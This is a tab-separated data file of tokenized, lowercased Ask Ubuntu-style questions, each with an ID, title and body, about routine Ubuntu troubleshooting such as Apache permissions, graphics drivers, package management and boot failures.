292968	apache2 : forbidden you do n't have permission to access /dir/ on this server	i can access localhost but not the sub directories index.html my default conf looks like : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/*/ > allow from none order allow , deny < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined even after allowing read/edit/write access to the directory , its showing forbidden error . tried all possible ways out in forums , didnt worked . anyone has a solution . between above i tried something for sub directory access : < directory /var/www/*/ > allow from none order allow , deny < /directory > please suggest me possible solution . thanks !
292972	how to completely remove cairo dock and reinstall it	i installed gnome shell and when i did the cairo dock is not opening at all it opens the maintenance mode and i can not edit the preferences i want to uninstall it and reinstall maybe it 'll help ti fix it or if anyone have any idea that would help i installed it from sofware center and i tried purge and it was n't worked i tried cairo-dock -ol debug and that was the output
292975	drivers not detected on laptop	i have a dell inspiron 1545 with both windows 7 64 bit and ubuntu 13.04 64 bit running side by side . windows 7 has managed to pick up all drivers but ubuntu has not . any ideas as to how i can solve this issue ? thanks
292979	upgrade php to 5.4 on ubuntu 11.10	i want to upgrade php from 5.3.6 to 5.4 on ubuntu 11.10 according to some tutorials i did : 1. sudo add-apt-repository ppa : ondrej/php5 2. sudo apt-get update 3. sudo apt-get upgrade i also tried to remove php and install it again but i still have 5.3.6
292981	graphic card driver , xorg ( open-source ) version vs proprietary ( amd and nvidia ) version , which is the best ?	i would like to ask about the graphic card driver on linux . from on my experience here is , im having a laptop with a hd6320 from e-450 apu , which is belong to my friend and i install it an xubuntu 13.10 on it ( from what i know the default installation of some linux distribution , the xorg driver for graphic cards will be installed by default . ) , then i install a compiz and docky included . . first try on it until a weeks it was good , the docky hover movement is smooth and wobbly windows also . then after i know that 's all , i try to install the proprietary driver one that been provided by amd officially . after all the installation runs good and reboot , i notice at the docky bar , some of transparent ( alpha ) part having a black background and when i hover a some buttons on docky , its lagging about maybe 5-20 fps . and the wobbly windows from compiz did have some lag too , but i notice it that it is n't quite a big lag . . my question in here based from my experience , does the proprietary driver is really that bad ? or it is just i am ? ... . and do you guys also have a same problems as mine with a different builds as mine ? ... should i need to stick back again with xorg driver ( open-source ) ?
292984	ubuntu update manager is showing an error message	the error message is as follows : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) '
292986	unable to create `/etc/skel/.bash_logout.dpkg-new ' : no such file or directory	i canâ´t install any updates . i tried apt-get clean , apt-get install -f , dpkg -- configure -a . nothing helps . i even tried to create a file or a directory in /etc/skel - it can not be done , even with root . /etc/skel is completely empty . while trying to update , my update manager shows me this : package : /var/cache/apt/archives/bash_4.2-2ubuntu2.1_amd64.deb error : unable to create `/etc/skel/.bash_logout.dpkg-new ' ( while processing `./etc/skel/.bash_logout ' ) : no such file or directory
292987	can not mount my external hard drive anymore	i do not what happened , but i can not anymore automount my hard drive . it contains a vital data for me and have no whish losing it . any help is very much appreciated i was trying to copy somes files from my ubuntu machine to my windows . i copied my files correctly , and unmounted my partitions one by one . then plugged the hard drive to my windows machine . which showed a weird error looking like 'error when writing some/system/file/ending/by/pointers ' . i suspect windows did something nasty to partition table which make mount/umount operations to be mabe . as for the symptoms : ubuntu 's and windows ' automounts can not mount the hdd partitions my hard drive is seen as /dev/sdb* xyz @ samtop : ~ $ ls /dev/sdb* /dev/sdb /dev/sdb1 /dev/sdb2 /dev/sdb3 manual mount loops forever : xyz @ samtop : ~ $ sudo mount /dev/sdb1 /media/exdrive1/ ^c^c^c^z^z could anyone , please , give me somes hints . much appreciate it
292988	ignore finger resting on trackpad button ( asus s200e )	i recently picked up an asus s200e and installed ubuntu 13.04 ; the issue im having is i can not rest my finger on the buttons while using my other finger to move the cursor without it locking up in place . the touchpad is integrated with the buttons . ive disabled and enabled two finger scrolling without any luck in fixing the problem . i 've tried changing the areabottomedge value so that the buttons become separate from the pad , which works but the same issue still remains with resting my finger on the button . i 've tried older release 's with no luck ; i 've only been able to find this thread on this specific issue : thread : ignore finger resting at the bottom of trackpad [ unibody macbook pro ] im relatively new to ubuntu so im here asking for any help , thankyou !
292989	unable to run *.sh files by directly double clicking the file in 13.04	facing this issue after upgrading to raring ringtail . before i could run .sh files by directly double clicking the file . but now it goes directly for editing instead of opening up a pop window which will allow me either to run in terminal or edit . how to solve this ?
292991	nvidia drivers in asus m50vc geforce9300m ubuntu	i 've installed ubuntu 13.04 in my asus m50vc and i have some problems with nvidia crashes and compiz errors . it presents lots of drivers by nvidia with 313 update , 310 update and the latest update was 304 update to nvidia . ihave tried the most recent drivers and now i 'm confused that ubuntu gets an older update after installed more recent nvidia updates . should i stop using nvidia drivers and use the xorg driver ? thank you for helping me .
292992	`` no adapters found '' for bluetooth in ubuntu 12.04 lts	i am using ubuntu 12.04 lts but the blueetooth assistant is showing : no adapters found on clicking any functionality such as `` set up new device '' . i have unblocked bluetooth using rkfill command . how to fix this problem ?
292994	how to modify unity icons	so i want to change couple of software icons for example `` rhythmbox '' i would like to change it 's icon can any one tell me where this software icons are stored and is it even possible to modify them without breaking the system thank you in advanced
292995	configure screensaver in ubuntu	how do i configure the screensaver in ubuntu ? i can see that gnome-screensaver is running .
293001	make a program run in a terminal	what command should i give to make a program run in a ( new ) terminal window ? background : i want to add another right-click option to peazip which will pass the selected par2 file to the ( installed ) program par2 , but i want it to run in a terminal , rather than the in the background . thanks .
293010	can not log in with gui after 12.10- > 13.04 upgrade	yesterday i ran the graphical program that offered to upgrade my ubuntu 12.10 system to 13.04 and it appeared to run flawlessly . by that i mean it presented no errors or warnings , ran to completion , and booted into 13.04 . however ... when i enter my password into the gui to log in , i see a flash of a somewhat jumbled text screen , and then the system returns to the login screen . if i enter the wrong password , it just tells me that my password is wrong . also , i verified that i can still log in across the network using ssh ( though the motd tells me that i 'm running 13.04 and that an upgrade to 13.04 is available ! ) this is n't a huge problem because i use the machine as a network server and almost never use the gui ( also , i utterly despise 'unity ' ) but since that 's the recommended way to upgrade , i 'll need it again someday . oh , i also tried running sudo apt-get update and then sudo apt-get upgrade just to be sure that everything was correctly updated and it found nothing to upgrade . any suggestions ?
293012	one o/s , 2 machines	quick question , is it possible to share my installation on my ssd between my main pc , and my laptop for when i go away , that way everything i need is still there , and dont have to worry about syncing files , programs , settings , etc . i tried this , but it has to reconfigure itself and then i have to go and reset all my driver settings each time i switch from one to the other , like is it possible to have say 2 kernels that i switch between depending on what im running off , and then select at grub when i boot up ?
293013	lenovo y500 camera not working	i am new to ubuntu and linux in general . i was able to install ubuntu 12.04 on my new lenovo y500 after many tries , everything seems to work perfectly except the builtin camera . i 've installed `` cheese '' and i get the following error everytime i start it up : ( cheese:2353 ) : warning ** : error starting streaming on device '/dev/video0' i 've tried it also on skype , but still its not working . the built-in camera brand is `` bison , chicony , liteon '' is there any chance that i can make it function ? any help is highly appreciated , i dont want to keep windows 8 just to use skype : (
293015	common sdk for ubuntu touch an `` classic '' ?	i started to develop apps for ubuntu using `` quickly '' . nice toolset and i love python as programming language . i have a question regarding development for mobile devices and the `` classic '' x86 systems : will there be a common tool for all of them in the future ? maybe pyqt and qml or something like that . can those future apps run on all flavours then ? thanx in advanve for your time ! greetings andi
293017	can not login ubuntu 12.04	i have been using ubuntu for 2 months and it work fine . yesterday i tried to make my texlive manager ( tlmgr ) running by inserting a path in /etc/profile.d . today when i wanted to login as usual , i can not login . i tried the ctrl-alt-f1 and login through tty1 . yes , i could login . the shell is there . however , when i wanted to open the /etc/profile.d to delete whatever i inserted , i could not open the file . i tried gedit command but the error is like this : gedit is available in /usr/bin/gedit gedit : command not found . can anyone help me . there are so many questions regarding this matter but i do not know which answer is relevant with my problem . thank you .
293019	changing computer name	can someone tell me how to change the computer name on a pc , i 've tried to edit the /etc/hostname file but it wo n't allow me access to save the amended file , thought the user the system created was the administrator obviously not . thanks
293028	how can i install ubuntu encrypted with luks with dual-boot ?	ubuntu 13.04 installation disk has an option to install ubuntu encrypted using luks . however , there is no option to perform an encrypted installation along-side existing partitions for a dual-boot scenario . how can i install ubuntu encrypted alongside another partition from the live disk ?
293030	install/remove list of packages from command line with apt-get	i 'm writing a makefile for our team to be able to set up a local environment with all of the software they need to install packages , etc so that they can develop quickly without having to figure out which software to install . our repository has a packages file that has all of the required ubuntu packages that can be installed with this little gem : [ unix ] $ sudo dpkg -- set-selections < packages [ unix ] $ sudo apt-get -u dselect-upgrade this is great because its easy for everyone to get their environment set up by putting this in a makefile . the challenge is how to restore their environment when the project is done . how do you uninstall all of the packages ( and their unused dependencies ) if you want to clean the environment ? is there an equivalent approach to remove a list of packages from the command line ?
293032	boot problems on ubuntu13.04 recursive fault , timeout killing /sbin/modprobe ... etc	another update , another problem . today i tried booting my dualboot win7 / linux machine , with following errors : at some point it does n't boot at all . it gets through grub , also shows the splash screen ( sometimes ) and then jumps back to a black screen with just a underscore blinking ( and never leaves that . it also seems my keyboard is n't recognized there at all ) . so i searched through the net and tried to boot into recovery mode . now exactly this error error `` fixing recursive fault but reboot is needed '' comes up , but the fix does n't work . ( same results ) . sometimes , after this `` recursive fault '' problem pops up , it 's also giving me a message like `` udev timeout killing /sbin/ ... '' windows though , does boot perfectly fine . i am kinda clueless about what 's going on and am doing a memtest atm . i 've also read it might be an incompability of my hardware with the latest ( kernel ? - ) update . i am using : gigabyte ga-870-ud3 mainboard amd 1090t x6 ( not overclocked ) 12 gigs of ram a nvidia gtx460 a samsung ssd 840 256gb ( booting from here ) a secondary samsung hdd 1 tb ( just for data shared among win7 and linux ) i have also already had problems with the samsung ssd 830 and ended up giving it back . might it be the case again ? here are two more screenshots of errors ( uploaded to google drive ) https : //drive.google.com/folderview ? id=0b-vdf -- pkpiaz2fvddj2uk84njg & usp=sharing edit : what i forgot : ubuntu boots just fine from a live cd edit2 : i also now edited everything out of fstab which was `` not essential '' ( e.g . everything except / and /home ) edit3 : seems to be that one https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1177086 edit4 : manually installed latest kernel ( v3.9.1-saucy/ ) did n't help . same issue again . edit5 : i finally decided to wipe . i wiped and reinstalled , updated to 13.04 ... unity does no want to show up , no matter what i do . finally wiping again and staying at 12.10. this sucks . if there is anything i can help you more with ... please ask .
293033	import vector graphics to inkscape	i 'm producing vector graphics in my research with maethematica and/or matlab , and i want to combine a few of them . i thought the best would be to use inkscape to do that , but unfortunately inkscape messes up the text in my graphics ( usually the axes labels and greek glyphs , but also plain text ) . this happens when i export the files in either pdf , svg or eps formats . i 'd really like to learn about two types of solutions : is there an easy way to fix this ( install fonts etc ) ? or is there a more suitable program than inkscape ?
293039	gtk.selectionmode.multiple allows selection of only one row in gtk.treeview	i 'm developing an application using quickly . i have a gtk.treeview with a gtk.liststore as its model . the selection mode of the gtk.selectionmode is set to gtk.selectionmode.multiple . the problem is that the gtk.selectionmode does not behave as it should : only one row can be selected at a time . impossible to select multiple rows using the ctrl or shift key . once a row is selected , it ca n't be deselected using the ctrl key . nothing happens when i press the arrow keys . the problem can be easily reproduced by creating a new ubuntu application using quickly ( or you can download a test application below ) . $ quickly create ubuntu-application test $ cd test $ quickly design create a treeview with a liststore as its model . set the mode of the gtktreeselection to 'multiple ' . add some columns and values to the liststore . add some treeviewcolumns with cellrenderertexts to the treeview . $ quickly run -v note you ca n't select multiple rows . some things i 've already tried , but did not change anything : setting the selection mode in the code . self.ui.selection.set_mode ( gtk.selectionmode.multiple ) or self.ui.treeview.get_selection ( ) .set_mode ( gtk.selectionmode.multiple ) moving the gtktreeselection < child > below the gtktreeviewcolumn < child > in the ui file . deleting the gtktreeselection from the ui file and setting the selection with self.ui.treeview.get_selection ( ) .set_mode ( gtk.selectionmode.multiple ) am i overlooking something obvious ? or could this be a bug ? on a side note , if you set the selection to 'single ' , it 's also not possible to deselect the row . edit if you 'd like to help me out , you can download a test application here instead of creating a new project with quickly on your own . please note you need quickly to run it . $ cd test $ quickly run i 've implemented some callbacks for testing purposes in test/test/testwindow.py . you can find the ui definition in test/data/ui/testwindow.ui .
293042	setup gzip for svg on apache2 server in ubuntu12.10	i need to enable gzip for svg globally but not able going well . i have gone through a lot of links nothing seems to work . to keep in simple below are the steps after installing apache i placed a folder ( mysvgtest ) with a index.html file with default location /var/www i was able to browse to the location from the browser and the page rendered http : //localhost/svgtest/index.html i ran `` a2enmod deflate '' and it gave me that the module is loaded . then i went to /etc/apache2/mods-enabled and opened deflate.conf over there i added addoutputfilterbytype deflate image/svg+xml i restarted apache the svg file is not getting gziped . is there any thing else i am missing i do not see any option to change the compression level . thanks
293044	fonts and spacing seems to have changed after installation of a package	to get the window builder in eclipse to work i had to install some dependencies . one of them seem to have changed the font everywhere , even in the terminals . it somehow looks like kdess fontset . this is the ones that i installed : libiw-dev libhunspell-1.3-0 libasound2-dev libnotify-dev libdbus-glib-1-dev libgtk2.0-dev libgtk2.0-0 gtk2-engines libidl-dev libhunspell-dev libstdc++6-4.4-dev pango-graphite which one could be the one that changed it ?
293048	ubuntu 13.04 - black screen with unresponsive cursor	few days ago i installed ubuntu 13.04 on a new machine without big issues . today , after the boot , i have this situation : grub correctly loaded and normal boot normal purple screen with red dots instead of normal login screen i have a black screen with an almost unresponsive mouse pointer and keyboard ( they are really slow and they react with a latency of a couple of seconds ) hitting multiple times ctrl+alt+f1 i can reach a console and there operate normally ( no latency anymore ) i tried to restore the desktop environment giving unity to the console but it can not start . the only `` suspect '' actions that i could have done yesterday are an upgrade from the repositories and maybe , having left a usb-key plugged . after a lot of trial-and-error , the only workaround that i found effective is to launch ubuntu in recovery mode and then , from the list , select the first field : recover normal boot ( or something similar ) . i really can not understand why in this way stuffs are working fine . do you have any idea of what the heck is going on ? thanks a lot in advance : d
293049	wireless n-networks in ubuntu 13.04 and wicd	i just installed ubuntu 13.04 on my lenovo e530 laptop , and found myself having trouble connecting to the company 's wireless network which uses the n-standard . i have no trouble connecting to g-networks . after roaming the forums i found an advice to install the wicd network manager . i did so , following the instructions at install wcid network manager . after rebooting i was asked to enter my password with the reason that `` wicd needs to access your computer 's network cards '' . but my password was rejected as being incorrect . after roaming some more i think i found that it wants the root password . but afaik the default ubuntu setup has no such thing . in addition , the failure to give a satisfactory password is responded with a complete freeze of the entire interface , except for the mouse . i had to alt-ctrl-f1 out , remove wicd and reboot to be able to ask this question . additional info : $ lspci | egrep -i network 03:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) any help , in particular to my original problem of being unable to connect to an n-network , is highly appreciated .
293051	in synaptic , how can one see what 's been marked ?	in synaptic , how can one see what 's been marked ? ( a case of title says it all ? )
293059	how to install ubuntu desktop 13.04 with mirror raid ?	i 've now spent hours trying and failing to figure out how to install ubuntu desktop 13.04 on my new desktop while setting up raid as part of the installation . i tried following the following two tutorials : http : //www.michielovertoom.com/linux/ubuntu-software-raid/ http : //blog.foobaria.com/2010/05/installing-ubuntu-1004-desktop-with.html each time the installation ends with a pop-up error saying something about `` 'grub-install dummy ' failed '' . it 's a pc with a pair of 120gb ssds . it would be cool to have /boot on the mirror , but not essential . i 've tried both that , and having a separate unmirrored /boot partition with the rest of the disk space dedicated to a mirrored root ( / ) partition ( the two tutorials cover both approaches between them ) . help ? ps-it 's annoying that this is n't yet a simple checkbox option during install , the way home dir encryption became a few years ago . also , the awesome alternate distro is no longer available for recent releases . pps-i 've seen some people say to use 13.04 server or 12.04 alternate installer , then upgrade to 13.04 and install a desktop manually ( if starting with server ) . is that a straightforward and safe way to end up with the equivalent of having installed desktop 13.04 in the first place ?
293061	new to linux desktop does n't look right	i burned ubuntu 13.04 to a dvd and booted it on an intel pentium iii desktop . on live disc boot , the log in screen looked fine and , once logged in , the bar across the top and the applications dock along the side look fine , but the desktop wallpaper looks odd . the colors are inverted and horizontally squished , resulting in two side-by-side identical desktop images , interaction is different . if i want to click on one of the two options which appear- a folder icon labeled `` examples '' , and a drive icon with the ubuntu logo and a arrow on it labeled something like `` install ubuntu '' ( these icons and their text are also effected by the psychedelic effect ) , i have to imagine about where they would lie if the screen where rendered correctly . the same with the drop down menus from the icons in the top right corner and any windows i try to pull up ; each window as a whole takes up the amount it would be expected to , and the bar across the top of the window looks fine in normal color , but the content of the window will have a green tint and will either squish and double side by side like the desktop and sometimes have a weird counter clockwise slant . i then tried booting into another option within the boot menu in hopes of different results . the second on from the bottom ( i think it started with a `` k '' ... ? ) booted and automatically gave me the install prompt . thinking it were an issue associated with the live disc boot , i installed it to the hard drive , and stupidly replaced the windows xp professional install . i was then able to boot into ubuntu without the disc ( of course ) , and the problem persisted . i tried to access the boot menu by holding shift while booting , but that has n't worked . thanks in advance . i realize my system is rather outdated , but lubuntu did n't do any better . i really only want to use this system to get acquainted with ubuntu and linux , and run eclipse for android app development . edit : perhaps some photos could clear things up ; https : //www.box.com/s/mkaetouml2vr15re2fsi notice the one of the log in screen looks fine ...
293065	installing ubuntu on a hdd	i recently purchased a 2tb wd mybook external hard-drive with the intention of installing ubuntu on it in a way that will allow me to simply plug it in to any computer and boot my ubuntu from virtually anywhere . i now realize i should probably have consulted folk here before buying the hdd , but it 's too late for that now . i installed ubuntu as i usually do , but it did n't work . after some investigation and much tweaking i managed to boot it -- once -- on my brother 's laptop . now i ca n't do that , and i still ca n't boot it from any other computer . i 'm perfectly willing to format it and start again . what is the best way to do this , preferably without using a livecd ( as my own laptop does n't have a cdrom ) ?
293068	usb ethernet dongle - pxe support	i 'm running xubuntu 12.10 on my asus zenbook ux31e . zenbook is shipped within an asix usb ethernet dongle . here some information . *-network description : ethernet interface physical id : 2 logical name : eth0 serial : 9c : eb : e8:01:96:59 size : 100mbit/s capacity : 100mbit/s capabilities : ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=asix driverversion=22-dec-2011 duplex=full firmware=asix ax88772 usb 2.0 ethernet ip=192.168.0.228 multicast=yes port=mii speed=100mbit i 've set up a working pxe , but unfortunately it does n't work for only my zenbook . the bios , as soon as the dongle is attached , allows to enable boot from network . once i start it , everything seems to proceed well , the dongle is recognized , an ip is assigned but the process gets stuck when the tftp location is given . it can not find the file . here what happens : client ip : address mask : 255.2555.255.0 dhcp ip:192.168.0.11 gateway ip : 192.168.0.1 tftp pxe-t01 : file /srv/pxetftp/here appears strange signs pxe-e3b tftp error - file not found pxe-m0f : exiting intel pxe rom why does it behave in this way ? does n't it simply support pxe ? usually the nic should get the list of available kernels trying to match the file name with its mac address but here that does n't happen . note well that apart pxe the dongle works great . thank you for any help !
293069	can google music manager be launched at startup ?	i would like google music manager to launch at startup . i can not find a way to accomplish this . anyone have help ?
293072	ca n't get cdrecord to work on new 13.04 installation	just upgraded a laptop to 13.04 . via brasero , i can burn cds and dvds , but when i try cdrecord from the command line i get : $ cdrecord -- devices wodim : no such file or directory . can not open scsi driver ! for possible targets try 'wodim -- devices ' or 'wodim -scanbus ' . for possible transport specifiers try 'wodim dev=help ' . for ide/atapi devices configuration , see the file readme.atapi.setup from the wodim documentation . i get that same error regardless of the parameters with which i invoke the command . is there some sort of package dependency issue ? edit — running wodim with strace shows that it tries to open all the drives /dev/hda through /dev/hdz , then everything from /dev/scd0 through /dev/scd255 , and then it quits . it 's probably a configuration thing .
293083	no empathy autostart in ubuntu 13.04	i have recently installed ubuntu 13.04 from scratch and configured two accounts in the account manager and gave permission to empathy to access them . after a reboot , empathy wo n't autostart so i have to start it manually from unity chat applet , empathy option . after starting empathy , everything works as expected , and i can chat with my friends . i need empathy to autostart at logon how can i solve this ?
293087	burning a ubuntu install disk on mac	when i downloaded the latest ubuntu .iso , i went to burn it on my mac to be able to dual boot into ubuntu using bootcamp , so the disk burned fine , but when it finished , it said my computer could n't read it . why is this ?
293088	tv tuner card - installation on ubuntu 12.04	i 've beetel tv tuner card ( beetel fun ) which runs on windows . is there any way to use this tuner card on ubuntu 12.04 . if possible please mention the procedure for all the required installations .
293091	how to activate deactivated repository after upgrade ?	i upgraded to raring from quantal , and bitdefender and dropbox repositories are disabled . synaptic > other software > disabled on upgrade to raring i try to put check in the box , but it is not marked . what should i do to activate them ?
293094	why wo n't honeyd start on boot ?	i have installed honeyd on my machine and configured the appropriate settings to get it to run as a service . the service will run fine and functions as expected if i start it with command : sudo service honeyd start however , the service does not automatically start when i reboot the machine . i have run the command sudo update-rc honeyd defaults and i receive the output `` system start/stop links for /etc/init.d/honeyd already exist . '' i have attempted to find any useful log information on the failure to start with more /var/log/* | grep honeyd the results of this search show the output of the service starting and stopping when i do so manually , but no events are listed during bootup of the machine , leading me to believe it is not even attempting to start . i can post the contents of the various honeyd configuration files if needed , though i believe they are correctly setup since i can start the service manually . any guidance is most appreciated .
293095	reset gnome glib schemes	i accidently deleted /usr/share/gnome-shell from my pc ( gnome 3.8 ) , so i copied it form my other pc ( that has 3.9.1 ) . now when i start gnome-shell in the terminal , it says there is no key 'toggle-overview ' in org.gnome.shell.keybindings how can i restore those glib schemas ?
293096	how to tail output of program started from crontab that prints to stdout ?	i have a program , say # ! /bin/bash while ( true ) { echo 'hello' sleep 10 } which is started from the crontab like so 0 0 1 1 * i can list this running process using a command like ps aux | grep print.sh is there a way i can view the stdout of this script after it 's been started from the crontab ?
293097	ubuntu efi portable	i need to install ubuntu on my usb pendrive 3.0 in order to have my `` portable computer '' everywhere i go . but i need it to work also on efi systems . i 've tryied by installing ubuntu on a virtualbox hd ( the copy of the usb pendrive ) and it works if i set the vm as efi . the problem is that it does n't boot on other computers . i 've done a manual partition with this scheme : 32gb usb pendrive : - 150 mb : efi partition ( efi boot ) - 258 mb : ext2 partition ( boot ) - the rest : ext4 partition ( root ) any ideas why the bios recognize all the partitions but when i try to boot from the efi one nothing happens ? if anyone can suggest me a guide or something useful for what i 'm doing it will be very kind ... thanks in advance for the answer
293099	stop screenlets from minimizing ( in gnome shell )	i know there is a similar question already ( stop screenlets from minimizing ) but the solution for the question uses compizconfig-settings-manager which does n't work with gnome shell . is there any other workaround so that when i press win+d , the screenlets along with the desktop is shown ? a shell extension which allows certain windows to 'skip taskbar ' can do the above job , but i could n't find any .
293100	how can i determine what packages i had installed before a new install ?	situation : want to move from 32-bit to 64-bit environment ( taking advantage of > 4gb ram ) bought new hdd and installed new os mounted old hdd as a secondary device question : how can i determine all package i had installed ( irrespective of platform - i 'll install proper platform on the new install ) ?
293104	how can i determine what services i had running before a new install ?	background : want to move from 32-bit to 64-bit environment ( taking advantage of > 4gb ram ) bought new hdd and installed new os mounted old hdd as a secondary device question : how can i determine all services i had installed and running on the old system ?
293105	how to disable kde 's brightness osd ?	i am using lightum to automatically control the screen 's brightness depending on the surrounding light ( on a retina macbook pro ) . the problem is , though , that kde picks up the change and displays the osd ( same one that shows up when you change brightness with keyboard ) . the brightness changes slightly every minute or so , making the osd incredibly annoying . i would gladly get rid of it entirely if i could . some research i looked in kde 's notifications settings , found nothing . i also grep 'd ~/.kde/share/config , found nothing . google did n't help either . apparently setting the brightness by doing # echo 4 > /sys/devices/pci0000\:00/0000\:00\:02.0/backlight/acpi_video0/brightness does n't bring up the osd . from the source code , lightum seems to be setting brightness via dbus ( org.kde.solid.powermanagement.setbrightness ) .
293108	system-config-printer in xubuntu raring	my system-config-printer in xubuntu raring is bahaving rather odd , when i click the server settings . as you see the first option ( to show the printers of other systems ) is missing . my installation is precise-clean- > upgrade to quantal- > upgrade to raring . i tried to compile the newest system-config-printer which is now in version 1.4 but the problem persists . i also tried purging system-config-printer-* and reinstalling them back . none worked . is this a `` feature '' in raring , since i ca n't find anything on the web describing this issue ?
293110	resize2fs : invalid argument while trying to resize /dev/sda1 ( dd problems )	i was attempting to copy my ubuntu installation to a larger hdd following this guide with the dd command . the guide says : '' it 's recommended you dd to an identical partition for optimal results . '' but i have a feeling that it is actually mandatory and that this is the root of the issue . since it did n't make it seem too important that the partitions were the same size i made a partition or roughly the same size , leaning to a little larger , on the new drive using gparted . the guide also did n't say that you could n't be running off of the drive you were cloning so i was booted from it . after running dd if=/dev/sdc6 of=/dev/sda1 from the guide , which neglected to mention the the uuid would be copied creating new issues that had to be corrected , i rebooted and tried to mount the new cloned partion but am given : mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so so i looked up how to fix a bad super block , i figure it is the super block because tune2fs complained about it when fixing the uuid , and found a filesystem failure guide that said e2fsck -f /dev/sda1 should fix the issue . it instead gives me the error : e2fsck 1.42 ( 29-nov-2011 ) the filesystem size ( according to the superblock ) is 18037760 blocks the physical size of the device is 17948416 blocks either the superblock or the partition table is likely to be corrupt ! abort < y > ? so i look up how to correct mismatching partition sizes and find a forum question on that topic with everyone saying resize2fs -f /dev/sda1 should resolve it but that gives me the error output : resize2fs 1.42 ( 29-nov-2011 ) resizing the filesystem on /dev/sda1 to 17948416 ( 4k ) blocks . resize2fs : invalid argument while trying to resize /dev/sda1 please run 'e2fsck -fy /dev/sda1 ' to fix the filesystem after the aborted resize operation . when i look up the resize2fs error i can only find bug reports and other low-level things that do n't help me . which just loops me back to the previous problem . so my question is : can i fix the partition size , or is there some other step i need to take ? i would prefer not to have to reclone the drive as it took over 16 hours to do it ( that may be because i was booted off it , the drive is only 72gb ) .
293117	not able to install javaws	i need to use java web start to run topcoders contestappletprod.jnlp . when i try to run the the arena i get java not found error . upon selecting the option `` using java web start '' the jnlp file opens up in firefox showing a download dialog which keeps on recurring . the commands java and javac pretty much work on my system but javaws shows some package is required which on installation command says its already installed . has anybody come across this problem ? any suggestions to solve are appreciated .
293118	problem putting ubuntu onto usb	i 'm trying to download ubuntu 12.04.2 onto my usb . so far i have a iso to usb file downloaded onto my hard drive . when i try to copy it to my usb , i 'm asked for an .iso file , but i can not find it . what 's wrong ?
293120	how can i disable the lock screen away message in cinnamon ?	i have an issue where the lock screen wants me to input an 'away message ' . how can i disable this option ? this is with the cinnamon window manager on ubuntu 12.04 .
293134	how can i make my .deb package replace a file in the system ?	you know that you ca n't make a .deb package that replaces a file on the system which belong to another package , but i need to create a .deb package for the settings ( gnome-settings , kde-settings , in the system disk not in the home ) so i need to replace the file . is there any way i can do that in somehow ? thanks .
293138	13.04 - logon screen frozen	i am very new with ubuntu , been a windows user since the beginning . yesterday i did a recommended software update on my laptop running ubuntu 13.04 , upon restarting i ca n't login at all . the login screen appears , i can move my mouse around but i ca n't click anywhere to login , not my username , not on the power button in the top corner of the screen , nowhere . i installed gnome 3.8 as a shell and everything was going fine , i guess , until i did the update . one thing though , while it was updating , a message appeared saying that some updates could n't be applied due to some components that were not downloaded properly . is there a way to repair ubuntu or do i have to re-install everything from scratch ?
293139	add items to gnome menu	how does one add an item to this : i already tried looking in the .desktop file of ( e.g . documents ) but i could n't find anything
293145	surface pro stylus and touch behavior after installing ubuntu 12.10	i have recently installed ubuntu 12.10 in surface pro . everything works fine , but the stylus and touch behaves in an undesired way . moving my finger or stylus around the screen automatically selects files and folders , by creating a rectangle , as if i am pressing the left click button of the mouse permanently . i will be very grateful , if anyone could suggest how i can correct this type of undesired behavior ? thanks in advance !
293146	choppy video playback in 13.04	i 've had a tremendous amount of trouble with my nvidia drivers and have finally settled on a version that seems to be working acceptably . kind of . when i view a video of any kind , irrelevant of quality , i get awfully choppy , pixelated video . i 'm aware this is definitely more graphics issues and i 'm edging closer to the final straw . my question is not only can someone help me to fix these issues , but i 'd like to know if there 's a more recommended graphics card out there that wo n't have any problems . are ati cards less susceptible to these kind of problems ? am i best sacrificing performance and just running the onboard intel ? i 'm running a packard bell ixtreme with the following specs : memory : 4gb processor : i3-2100 @ 3.10 ghz x4 graphics : geforce gt 610/pcie/sse2 ( with onboard intel hd3000 that is disabled and 310 driver with xorg edgers . ubuntu 13.04 64-bit
293148	grep `` + '' operator does not work	this ls -l /var/log | awk ' { print $ 9 } ' | grep `` ^ [ a-z ] *\.log . '' outputs this : alternatives.log.1 alternatives.log.10.gz alternatives.log.2.gz alternatives.log.3.gz alternatives.log.4.gz alternatives.log.5.gz alternatives.log.6.gz alternatives.log.7.gz alternatives.log.8.gz alternatives.log.9.gz apport.log.1 apport.log.2.gz apport.log.3.gz but this : ls -l /var/log | awk ' { print $ 9 } ' | grep `` ^ [ a-z ] +\.log . '' outputs nothing . why ? i just changed * to + . is n't it similar ? operator + just needs at least one match , and * zero or more .
293152	rdio quicklists	i would like to have `` play/pause '' `` next '' and `` previous '' buttons in the quicklist for my rdio.desktop `` web app . '' detailed explanation the web app can be created either from chrome ( by going to menu > tools > create application shortcuts ) or through unity 's web app interface . either of these methods puts a .desktop file in /home/user/.local/share/applications/ which opens a new browser window . in case you use chrome , the result is : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 name=rdio exec=/opt/google/chrome/google-chrome -- app=http : //www.rdio.com/ terminal=false icon=/home/user/icons/rdio.png type=application categories=network ; webbrowser ; startupwmclass=www.rdio.com in the case you use unity 's web app feature , the result is : [ desktop entry ] name=rdio type=application icon=rdio-www.rdio.com mimetype= actions=s0 ; s1 ; s2 ; s3 ; s4 ; s5 ; s6 ; s7 ; s8 ; s9 ; s10 ; exec=unity-webapps-runner -n 'umrpbwa= ' -d 'www.rdio.com ' % u i want to add something like the following to either .desktop file ( preferably the chrome one because unity web apps do n't work correctly ) so that i can control playback with a right click : x-ayatana-desktop-shortcuts=playpause ; next ; previous ; [ playpause shortcut group ] name=playpause exec=google-chrome ( some arguments here ? ) rdio.com/ ? 